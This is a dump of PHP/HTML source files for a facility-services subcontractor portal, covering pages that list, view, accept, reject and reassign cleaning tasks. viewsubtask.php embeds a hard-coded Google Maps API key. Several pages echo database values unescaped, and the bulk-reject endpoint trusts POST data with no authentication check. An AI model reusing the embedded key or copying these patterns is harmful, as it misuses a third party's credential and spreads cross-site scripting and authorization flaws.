--> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-footer"> <div class="d-flex"> <div class="col-lg-3 col-md-6 col-sm-12"> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Completed Subtasks</h6> <h2><?= $CompletedSubtaskcount; ?></h2> </div> <div class="icon"> <i class="ik ik-shopping-cart"></i> </div> </div> </div> </div> </div> <div class="col-lg-3 col-md-6 col-sm-12"> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Incomplete Subtasks</h6> <h2><?= $IncompletedSubtaskcount; ?></h2> </div> <div class="icon"> <i class="ik ik-inbox"></i> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <!-- Date Filter and Today Checkbox --> <div class="row mb-4"> <div class="col-md-3"> <div class="form-group"> <label for="startDate">Start Date</label> <input type="text" id="startDate" class="form-control datepicker" placeholder="Select start date" value="<?= htmlspecialchars($startDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="endDate">End Date</label> <input type="text" id="endDate" class="form-control datepicker" placeholder="Select end date" value="<?= htmlspecialchars($endDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="serviceLocationId">Select a Service Location:</label> <select id="serviceLocationId" name="serviceLocationId" class="form-control select2"> <option value="">All Locations</option> <?php foreach ($services as $service) { $selected = ''; if (isset($_GET['service_location_id']) && $_GET['service_location_id'] == $service->id) { $selected = 'selected'; } echo '<option value="' . htmlspecialchars($service->id) . '" ' . $selected . '>' . htmlspecialchars($service->name) . '</option>'; } ?> </select> </div> </div> <div class="col-md-3 d-flex align-items-center"> <div class="form-check form-check-inline"> <input class="form-check-input" type="checkbox" id="todayCheckbox" value="today" <?= ($startDate == date('Y-m-d') && $endDate == date('Y-m-d')) ? 'checked' : '' ?>> <label class="form-check-label" for="todayCheckbox">Today</label> </div> </div> <div class="col-md-3 d-flex align-items-center"> <button id="applyFilter" class="btn btn-primary">Apply Filter</button> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <!-- Subtask Table --> <?php foreach ($subtasks as $date => $subtaskList) { ?> <div class="row subtask-row" data-date="<?php echo $date; ?>"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Subtasks for <?php if ($date == date('Y-m-d')) { echo 'Today'; } else if ($date == date('Y-m-d', strtotime('tomorrow'))) { echo 'Tomorrow'; } else { echo date('l, F j, Y', strtotime($date)); } ?></h3> <div class="card-header-right"> <ul class="list-unstyled card-option"> <li><i class="ik ik-chevron-left action-toggle" data-toggle="tooltip" title="Collapse"></i></li> <li><i class="ik ik-minus minimize-card" data-toggle="tooltip" title="Minimize"></i></li> </ul> </div> </div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="advanced_table_<?php echo strtotime($date); ?>"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Date</th> <th>Time</th> <th>Assigned</th> <th>Completed</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtaskList as $subtask) { ?> <tr> <td>ST-000<?= $subtask['id']; ?></td> <td><?= $subtask['service_name']; ?></td> <td><?= $subtask['subtask_date']; ?></td> <td><?= $subtask['subtask_time'] ? date('h:i A', strtotime($subtask['subtask_time'])) : ''; ?></td> <td><?= $subtask['assigned'] ? '<span class="badge badge-success">Assigned</span>' : '<span class="badge badge-danger">Not Assigned</span>'; ?></td> <td> <?php if ($subtask['ignored']) { echo '<span class="badge badge-warning">Ignored</span>'; } else { echo $subtask['completed'] ? '<span class="badge badge-success">Completed</span>' : '<span class="badge badge-danger">Not Completed</span>'; } ?> </td> <td> <a href="viewsubtask.php?id=<?= $System->encryptData($subtask['id']); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <!-- Include jQuery and Bootstrap Datepicker JS --> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script> $(document).ready(function() { // Initialize datepickers $('.datepicker').datepicker({ format: 'yyyy-mm-dd', autoclose: true, todayHighlight: true }); // Function to save filters to localStorage function saveFilters() { var filters = { startDate: $('#startDate').val(), endDate: $('#endDate').val(), serviceLocationId: $('#serviceLocationId').val(), todayCheckbox: $('#todayCheckbox').is(':checked') }; localStorage.setItem('dateRangeFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('dateRangeFilters')); if (filters) { $('#startDate').val(filters.startDate); $('#endDate').val(filters.endDate); $('#serviceLocationId').val(filters.serviceLocationId); $('#todayCheckbox').prop('checked', filters.todayCheckbox); } } // Function to reset filters function resetFilters() { $('#startDate').val(''); $('#endDate').val(''); $('#serviceLocationId').val(''); $('#todayCheckbox').prop('checked', false); localStorage.removeItem('dateRangeFilters'); applyDateRangeFilter(); } // Apply date range filter by modifying the URL function applyDateRangeFilter() { var startDate = $('#startDate').val(); var endDate = $('#endDate').val(); var serviceLocationId = $('#serviceLocationId').val(); var url = window.location.href.split('?')[0] + '?start_date=' + startDate + '&end_date=' + endDate + '&service_location_id=' + serviceLocationId; window.location.href = url; } // Event handler for applyFilter button $('#applyFilter').on('click', function() { saveFilters(); applyDateRangeFilter(); }); // Event handler for todayCheckbox $('#todayCheckbox').on('change', function() { if ($(this).is(':checked')) { var today = '<?= date('Y-m-d') ?>'; $('#startDate').val(today); $('#endDate').val(today); } else { $('#startDate').val(''); $('#endDate').val(''); } saveFilters(); applyDateRangeFilter(); }); // Add reset filters button functionality $('#reset_filters').on('click', function() { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> <?php include('footer.php'); ?>subcontractor/head.php000064400000011437151676701240011065 0ustar00<?php session_start(); require_once '../../Classes/System.php'; $system = new system(); // Check if the user is not logged in or is not an admin if (!$system->isLoggedIn() || !$system->isSubContractor()) { header('Location: ../login.php'); exit; // Stop further execution } $companyId = $_SESSION['user_id']; ?> <!doctype html> <html class="no-js" lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <!-- Set title as $pageTitle if it is set, otherwise set it as "Emera Facility Services"--> <title><?php echo isset($pageTitle) ? $pageTitle : "Emera Facility Services"; ?></title> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- jQuery --> <script type="text/javascript" charset="utf8" src="https://code.jquery.com/jquery-3.5.1.js"></script> <!-- <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">--> <!-- <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>--> <!-- <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>--> <link rel="icon" href="../../cropped-emera-holdings-favicon-1-32x32.png" type="image/x-icon" /> <script src="../../src/js/vendor/modernizr-2.8.3.min.js"></script> <script src="../../src/js/vendor/modernizr-2.8.3.min.js"></script> <!-- <script src="../../src/js/vendor/jquery-jvectormap-2.0.5.min.js"></script>--> <!-- <link rel="stylesheet" href="../../src/js/vendor/jquery-jvectormap-2.0.5.css">--> <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,400,600,700,800" rel="stylesheet"> <link rel="stylesheet" href="../../node_modules/bootstrap/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css"> <link rel="stylesheet" href="../../node_modules/ionicons/dist/css/ionicons.min.css"> <link rel="stylesheet" href="../../node_modules/icon-kit/dist/css/iconkit.min.css"> <link rel="stylesheet" href="../../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../../dist/css/theme.min.css"> <link rel="stylesheet" href="../../node_modules/flatpickr/dist/flatpickr.min.css"> <link rel="stylesheet" href="../../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../../node_modules/datatables.net-bs4/css/dataTables.bootstrap4.min.css"> <link rel="stylesheet" href="../../node_modules/tempusdominus-bootstrap-4/build/css/tempusdominus-bootstrap-4.min.css"> <link rel="stylesheet" href="../../node_modules/weather-icons/css/weather-icons.min.css"> <link rel="stylesheet" href="../../node_modules/c3/c3.min.css"> <link rel="stylesheet" href="../../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../../node_modules/owl.carousel/dist/assets/owl.carousel.css"> <link rel="stylesheet" href="../../node_modules/owl.carousel/dist/assets/owl.theme.default.css"> <link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.24/css/jquery.dataTables.css"> <link rel="stylesheet" href="../../node_modules/select2/dist/css/select2.min.css"> <script src="../../src/js/vendor/modernizr-2.8.3.min.js"></script> <script src="../../node_modules/sweetalert2/dist/sweetalert2.all.min.js"></script> <script src="../../node_modules/flatpickr/dist/flatpickr.js"></script> <script src="../../node_modules/select2/dist/js/select2.min.js"></script> <style> /* Optional: You can style your map container here */ #map { height: 400px; width: 100%; } </style> <script> document.addEventListener('DOMContentLoaded', function () { // Function to log previous page URL from session state // Save current page URL to session state function saveCurrentPageUrl() { var currentUrl = window.location.href; sessionStorage.setItem('previousUrl', currentUrl); } // Call saveCurrentPageUrl when navigating away window.addEventListener('beforeunload', saveCurrentPageUrl); }); </script> </head> <body> <div class="wrapper"> <?php include('header.php'); ?> <div class="page-wrap"> <?php include('sidebar.php'); ?>subcontractor/viewsubtask.php000064400000043426151676701240012536 0ustar00<?php include('head.php'); ?> <?php require_once '../../Classes/Database.php'; require_once '../../Service/SubtaskService.php'; require_once '../../Service/UserService.php'; require_once '../../Classes/System.php'; $System = new System(); $subtaskService = new SubtaskService(); $userService = new UserService(); if (!isset($_GET['id'])) { echo '<p>No subtask ID provided.</p>'; exit; } $subtaskId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$subtaskId) { echo '<script> Swal.fire({ title: "Invalid Subtask ID", text: "Please check the URL and try again.", icon: "error", confirmButtonText: "Ok" }).then(() => window.location.href = "viewAcceptedTasks.php"); </script>'; exit; } $subtask = $subtaskService->getSubtaskById($subtaskId); $users = $userService->getAllUsers(); if ($subtask->completed) { $submittedLocation = $subtaskService->getSubtaskLocation($subtaskId); if ($submittedLocation) { $latitude = $submittedLocation->latitude; $longitude = $submittedLocation->longitude; } else { // Handle the case where location is not found $latitude = null; $longitude = null; // Optionally, display an error message or take other actions echo "Location not found for the specified subtask."; } } ?> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD9O5PAsTaFPCHlIlM4XSK7ei-gaLMYpzk&callback=initMap" async defer></script> <div class="main-content"> <div class="container-fluid"> <div class="page-header row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Subtask</h5> <span>View details of a subtask</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="../../index.html"><i class="ik ik-home"></i></a></li> <li class="breadcrumb-item"><a href="#">Subtasks</a></li> <li class="breadcrumb-item active" aria-current="page">View Subtask</li> </ol> </nav> </div> </div> <div class="card"> <div class="card-header d-flex justify-content-between"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> <div> <?php if (!$subtask->assigned): ?> <button type="button" class="btn btn-primary" id="assignTaskButton">Assign Task to a cleaner</button> <?php endif; ?> <?php if ($subtask->assigned && !$subtask->completed): ?> <button type="button" class="btn btn-primary" id="assignTaskButton">Resend Task to a cleaner</button> <?php endif; ?> <?php if ($subtask->completed): ?> <!-- <button type="button" class="btn btn-primary" data-toggle="modal" data-target="#viewTaskCompletionFormModal">View Task Completion Form</button>--> <?php endif; ?> </div> </div> <div class="card-body"> <div class="row align-items-center mb-30"> <div class="col-md-12"> <table> <tbody> <tr> <td> <table> <tbody> <tr> <td><i class="ik ik-layers icon-large"></i></td> <td><h3 class="mb-0 fw-700 text-black"><?php echo $subtask->service_name; ?></h3></td> </tr> <tr> <td><i class="ik ik-calendar icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $subtask->subtask_date ? date('F j, Y', strtotime($subtask->subtask_date)) : 'Not set'; ?></h5></td> </tr> <tr> <td><i class="ik ik-clock icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $subtask->subtask_time ? date('g:i A', strtotime($subtask->subtask_time)) : 'Not set'; ?></h5></td> </tr> <tr> <td><i class="ik ik-user icon-large"></i></td> <td> <h5 class="mb-0 fw-500 text-black"><?php echo date('F j, Y', strtotime($subtask->updated_at)); ?></h5> </td> </tr> </tbody> </table> </td> <td> <table> <tbody> <tr> <td><i class="ik ik-check-circle icon-large"></i></td> <td> <?php if ($subtask->ignored) { echo '<span class="badge badge-yellow">Ignored</span>'; } else { if ($subtask->completed) { echo '<span class="badge badge-success">Completed</span> '; } else { echo '<span class="badge badge-danger">Not Completed</span>'; } } ?> </td> </tr> <!-- --><?php //if ($subtask->completed): ?> <!-- <tr>--> <!-- <td><i class="ik ik-calendar icon-large"></i></td>--> <!-- <td><h5 class="mb-0 fw-500 text-black">--><?php //echo $subtask->completed_at; ?><!--</h5></td>--> <!-- </tr>--> <!-- --><?php //endif; ?> <tr> <td><i class="ik ik-user icon-large"></i></td> <td> <?php if ($subtask->assigned): ?> <span class="badge badge-success">Assigned</span> <?php else: ?> <span class="badge badge-danger">Not assigned</span> <?php endif; ?> </td> </tr> <?php if ($subtask->assigned): ?> <tr> <td><i class="ik ik-mail icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $subtask->assigned_to_Mobile ?: 'Not set'; ?></h5></td> </tr> <tr> <td><i class="ik ik-check icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $subtask->assigned_Message_Rsponse ? 'Email sent successfully' : 'Unable to send email'; ?></h5></td> </tr> <tr> <td><i class="ik ik-file-text icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"> <?php echo $subtask->form_submission_id ? '<a href="../completedsubtaskform.php?id=' . $subtask->form_submission_id . '" target="_blank">View Submitted Form</a>' : 'Form not submitted'; ?> </h5></td> </tr> <?php if ($subtask->completed && property_exists($subtask, 'submitted_by_admin') && $subtask->submitted_by_admin): ?> <tr> <td><i class="ik ik-user icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><span class="badge badge-warning">Marked as completed by admin</span></h5></td> </tr> <?php endif; ?> <?php if ($subtask->form_submission_id): ?> <tr> <td><i class="fas fa-calendar-check icon-large"></i></td> <?php // Assuming $subtask->completed_at contains the datetime string $completedAt = $subtask->completed_at; // Create a new DateTime object with the original datetime $date = new DateTime($completedAt, new DateTimeZone('UTC')); // Set the timezone to Sydney $date->setTimezone(new DateTimeZone('Australia/Sydney')); // Format the date and time $formattedDate = $date->format('F j, Y, g:i a'); ?> <td> <h5 class="mb-0 fw-500 text-black"><?php echo $formattedDate; ?></h5> </td> </tr> <?php endif; ?> <?php endif; ?> </tbody> </table> </td> </tr> </tbody> </table> <style> table { width: 100%; border-collapse: collapse; } td { padding: 10px 15px; vertical-align: middle; } .icon-large { font-size: 24px; color: #333; } .mb-0 { margin-bottom: 0; } .fw-700 { font-weight: 700; } .fw-500 { font-weight: 500; } .text-black { color: #000; } .badge-success { background-color: #28a745; color: #fff; padding: 5px 10px; border-radius: 5px; } .badge-danger { background-color: #dc3545; color: #fff; padding: 5px 10px; border-radius: 5px; } </style> </div> </div> </div> </div> <?php if ($subtask->completed && $latitude !== null && $longitude !== null): ?> <div class="card"> <div class="card-header d-flex justify-content-between"> <h3>Submitted Location</h3> </div> <div class="card-body"> <div id="map"></div> </div> </div> <script> function initMap() { // Replace these PHP variables with actual PHP values var latitude = <?php echo $latitude; ?>; // PHP variable for latitude var longitude = <?php echo $longitude; ?>; // PHP variable for longitude // Create a map centered at a specific location var map = new google.maps.Map(document.getElementById('map'), { center: {lat: latitude, lng: longitude}, zoom: 12 // Adjust zoom level as needed }); // Add a marker at the specified location var marker = new google.maps.Marker({ position: {lat: latitude, lng: longitude}, map: map, title: 'Hello World!' // Marker tooltip (optional) }); } </script> <script async defer src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD9O5PAsTaFPCHlIlM4XSK7ei-gaLMYpzk&callback=initMap"> </script> <?php endif; ?> <script> document.getElementById('assignTaskButton').addEventListener('click', function () { Swal.fire({ title: 'Enter Cleaner Email', input: 'email', inputLabel: 'Cleaner Email', inputPlaceholder: 'Enter cleaner email', showCancelButton: true, confirmButtonText: 'Assign Task', showLoaderOnConfirm: true, preConfirm: (email) => { const subtaskIds = <?php echo json_encode([$subtaskId]); ?>; return fetch('../send_email_to_workers.php', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ action: 'bulk', // or 'single' depending on your logic worker_email: email, subtask_ids: subtaskIds }) }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } return response.json(); }) .then(data => { console.log('Response from PHP:', data); // Handle response data accordingly if (data.status === 'success') { Swal.fire({ title: 'Success!', text: 'Task has been assigned successfully', icon: 'success' }).then(() => location.reload()); } else { throw new Error(data.message || 'Unknown error'); } }) .catch(error => { console.error('Fetch error:', error); Swal.showValidationMessage( `Request failed: ${error.message}` ); }); }, allowOutsideClick: () => !Swal.isLoading() }); }); </script> </div> </div> <?php include('footer.php'); ?> subcontractor/rejecttask_bulk.php000064400000003165151676701240013337 0ustar00<?php session_start(); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/Task.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST['taskIds']) && isset($_POST['companyId'])) { $taskIds = $_POST['taskIds']; $companyId = $_POST['companyId']; $taskService = new TaskService(); $errors = []; foreach ($taskIds as $taskId) { $task = $taskService->getTaskByIdAsObject($taskId); if ($task) { $task->setAssignedTo(null); $task->setIsAssigned(0); // Get existing not accepted users $temp = $task->getNotAcceptedUsers(); $notAcceptedUsers = array_filter(explode(',', $temp)); // Add the new companyId if not already in the list if (!in_array($companyId, $notAcceptedUsers)) { $notAcceptedUsers[] = $companyId; } // Convert the array back to a string $task->setNotAcceptedUsers(implode(',', $notAcceptedUsers)); if (!$taskService->rejectTask($task)) { $errors[] = "Failed to reject task ID: $taskId"; } } else { $errors[] = "Task ID: $taskId not found"; } } if (empty($errors)) { echo 'success'; } else { echo implode(', ', $errors); } } else { echo 'invalid_data'; } } else { echo 'invalid_request'; } subcontractor/viewunassignedtask.php000064400000030756151676701240014107 0ustar00<?php include('head.php'); // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; // Initialize system and services $System = new System(); $taskService = new TaskService(); // Define and validate required variables $currentCompanyId = isset($companyId) ? $companyId : null; // Ensure $companyId is defined // Check if task ID is provided in URL if (isset($_GET['id'])) { $taskId = $System->decryptData($_GET['id']); $task = $taskService->getTaskById($taskId); if (!$task) { echo '<p>Task not found.</p>'; exit(); } } else { echo '<p>No task ID provided.</p>'; exit(); } ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Task</h5> <span>View details of a task</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Task</li> </ol> </nav> </div> </div> </div> <!-- New row for buttons and actions --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> </div> <div class="card-header-right"> <?php if ($task->is_assigned == 1 && $task->assigned_to == $currentCompanyId): ?> <h3><span class="badge badge-info">This task is already assigned to your company.</span></h3> <?php else: ?> <button id="acceptTask" class="btn btn-primary">Accept Task</button> <?php endif; ?> </div> </div> </div> </div> </div> <!-- Task viewing section --> <div class="row"> <div class="col-xl-6 col-md-6"> <div class="card"> <div class="card-body"> <div class="row align-items-center mb-30"> <div class="col-md-6"> <table> <tbody> <tr> <td><i class="ik ik-layers icon-large"></i></td> <td><h3 class="mb-0 fw-700 text-black"><?php echo htmlspecialchars($task->service_name); ?></h3></td> </tr> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo htmlspecialchars($task->region); ?></h5></td> </tr> <tr> <td><i class="ik ik-calendar icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo htmlspecialchars($task->schedule_name); ?></h5></td> </tr> <tr> <td><i class="ik ik-clock icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo htmlspecialchars($task->frequency); ?></h5></td> </tr> <tr> <td><i class="ik ik-eye icon-large"></i></td> <td> <h2><?php echo ($task->isPublic ? '<span class="badge badge-yellow">Open to accept</span>' : '<span class="badge badge-green">Task Assigned</span>'); ?></h2> </td> </tr> <?php if ($task->is_assigned == 1 && $task->assigned_to == $currentCompanyId): ?> <tr> <td><i class="ik ik-user icon-large"></i></td> <td><h6><span class="badge badge-info">This task is assigned to your company.</span></h6></td> </tr> <?php endif; ?> </tbody> </table> <style> table { width: 100%; border-collapse: collapse; } td { padding: 10px 15px; vertical-align: middle; } .icon-large { font-size: 24px; color: #333; } .mb-0 { margin-bottom: 0; } .fw-700 { font-weight: 700; } .fw-500 { font-weight: 500; } .text-black { color: #000; } .badge-success { background-color: #28a745; color: #fff; padding: 5px 10px; border-radius: 5px; } .badge-danger { background-color: #dc3545; color: #fff; padding: 5px 10px; border-radius: 5px; } </style> </div> <div class="col-md-6"> <?php // Assuming $task->dates is a JSON string $datesJson = $task->dates; // Decode the JSON string to an array $datesArray = json_decode($datesJson, true); // Extract the dates and format them for JavaScript $formattedDates = array_map(function ($dateEntry) { return $dateEntry['date']; }, $datesArray); // JSON encode the array for JavaScript $jsDates = json_encode($formattedDates); ?> <div id="datepicker"></div> <script> const today = new Date(); console.log(<?php echo $jsDates; ?>); flatpickr("#datepicker", { enable: <?php echo $jsDates; ?>, dateFormat: "Y-m-d", inline: true, defaultDate: today, disableMobile: "false" }); </script> </div> </div> </div> </div> </div> <div class="col-md-6"> <div class="card"> <div class="card-header"><h3>Subtasks</h3></div> <div class="card-body"> <?php // Fetch and display subtasks associated with the task $subtasks = $taskService->getSubtasksByTaskId($taskId); if ($subtasks) { echo '<table class="table" id="advanced_table"> <thead> <tr> <th>Date</th> <th>Time</th> </tr> </thead> <tbody>'; foreach ($subtasks as $subtask) { echo '<tr> <td>' . htmlspecialchars($subtask->subtask_date) . '</td> <td>' . ($subtask->subtask_time ? date('h:i A', strtotime($subtask->subtask_time)) : '') . '</td> </tr>'; } echo '</tbody></table>'; } else { echo '<p>No subtasks found for this task.</p>'; } ?> </div> </div> </div> </div> </div> </div> <script> console.log('Script block is running.'); var acceptTaskButton = document.getElementById('acceptTask'); if (acceptTaskButton) { acceptTaskButton.addEventListener('click', function() { console.log('Accept task button clicked.'); Swal.fire({ title: 'Are you sure?', text: "Do you want to accept this task?", icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, accept it!' }).then((result) => { if (result.isConfirmed) { var xhr = new XMLHttpRequest(); xhr.open('POST', 'accepttask.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); if (xhr.responseText === 'success') { Swal.fire( 'Accepted!', 'Task accepted successfully.', 'success' ).then(() => { window.location.href = 'viewtask.php?id=<?php echo $System->encryptData($taskId); ?>'; }); } else if (xhr.responseText === 'error') { Swal.fire('Error!', 'An error occurred. Please try again.', 'error'); } else if (xhr.responseText === 'task_not_found') { Swal.fire('Not Found!', 'Task not found.', 'warning'); } else if (xhr.responseText === 'invalid_data') { Swal.fire('Invalid Data!', 'Invalid data.', 'warning'); } else if (xhr.responseText === 'invalid_request') { Swal.fire('Invalid Request!', 'Invalid request.', 'warning'); } } }; var taskId = '<?php echo htmlspecialchars($taskId); ?>'; var companyId = '<?php echo htmlspecialchars($currentCompanyId); ?>'; xhr.send('taskId=' + taskId + '&companyId=' + companyId); } }); }); } else { console.error('Accept task button not found.'); } </script> <?php include('footer.php'); ?> subcontractor/footer.php000064400000000413151676701240011452 0ustar00<footer class="footer"> <div class="w-100 clearfix"> <span class="text-center text-sm-left d-md-inline-block">Copyright © 2024 genesis it labs. All Rights Reserved.</span> </div> </footer> </div> </div> <?php include('scripts.php'); ?>subcontractor/viewpublictasks.php000064400000022441151676701240013400 0ustar00<?php // Include head.php $pageTitle = "View Public Tasks"; include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $System = new System(); // Create TaskService instance $taskService = new TaskService(); $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); // Fetch tasks from the database $tasks = $taskService->getPublicTasks(); ?> <div class="main-content"> <div class="container-fluid"> <!-- Your existing HTML content --> <div class="page-header"> <!-- Your existing header --> </div> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>View Tasks</h3> </div> <div class="card-body"> <div class="form-group row"> <div class="col-sm-3"> <label for="filter_service" class="col-form-label">Filter Service Name:</label> <input type="text" class="form-control" id="filter_service"> </div> <div class="col-sm-3"> <label for="filter_region" class="col-form-label">Filter Region:</label> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> <div class="col-sm-3"> <label for="filter_frequency" class="col-form-label">Filter Frequency:</label> <select class="form-control" id="filter_frequency"> <option value="">All Frequencies</option> <option value="daily">Daily</option> <option value="3x/week">3x/week</option> </select> </div> <div class="col-sm-3"> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <table id="super_advanced_table" class="table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created At</th> <th>Public Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000'.$task->id; ?></td> <td><?php echo $task->service_name; ?></td> <td><?php echo $task->region; ?></td> <td><?php echo $task->frequency; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td> <label class="badge badge-<?php echo $task->isPublic ? 'yellow' : 'green'; ?>"><?php echo $task->isPublic ? 'Public' : 'Not Public'; ?></label> </td> <td> <a href="viewunassignedtask.php?id=<?php echo $System->encryptData($task->id); ?>" class="btn btn-primary">View Details</a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <script> $(document).ready(function () { // Initialize DataTable var table = $('#super_advanced_table').DataTable({ // Configure initial settings if needed }); // Function to save filters to localStorage function saveFilters() { var filters = { service: $('#filter_service').val(), region: $('#filter_region').val(), frequency: $('#filter_frequency').val() // Add more filters as needed }; localStorage.setItem('advancedTableFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('advancedTableFilters')); if (filters) { $('#filter_service').val(filters.service).trigger('keyup'); $('#filter_region').val(filters.region).trigger('change'); $('#filter_frequency').val(filters.frequency).trigger('change'); // Apply more filters as needed } } // Function to reset filters function resetFilters() { $('#filter_service').val('').trigger('keyup'); $('#filter_region').val('').trigger('change'); $('#filter_frequency').val('').trigger('change'); // Remove more filters as needed localStorage.removeItem('advancedTableFilters'); table.search('').columns().search('').draw(); } // Check previous page and apply filters if necessary function checkPreviousPage() { var previousUrl = sessionStorage.getItem('previousUrl'); if (!previousUrl || !previousUrl.includes('viewunassignedtask.php')) { resetFilters(); } else { applyFilters(); } } checkPreviousPage(); // Add custom filters $('#filter_service').on('keyup', function () { table.column(1).search(this.value).draw(); saveFilters(); }); $('#filter_region').on('change', function () { table.column(2).search($(this).val()).draw(); saveFilters(); }); $('#filter_frequency').on('change', function () { table.column(3).search($(this).val()).draw(); saveFilters(); }); // Add reset filters button functionality $('#reset_filters').on('click', function () { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> subcontractor/reassigntasktoworkers.php000064400000026101151676701240014634 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $System = new System(); $serviceService = new ServiceService(); $taskService = new TaskService(); // Fetch services for dropdown $services = $serviceService->getAllServicesForDropdown(); // Fetch tasks to display $tasks = $taskService->getTasksByAssignedAndNotCompletedAndNoCompletedSubtasks($companyId); ?> <div class="main-content"> <div class="container-fluid"> <!-- Page header --> <div class="page-header"> <!-- Breadcrumbs --> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Re Assign Tasks</h5> <span>Re Assign Tasks to a cleaner</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" 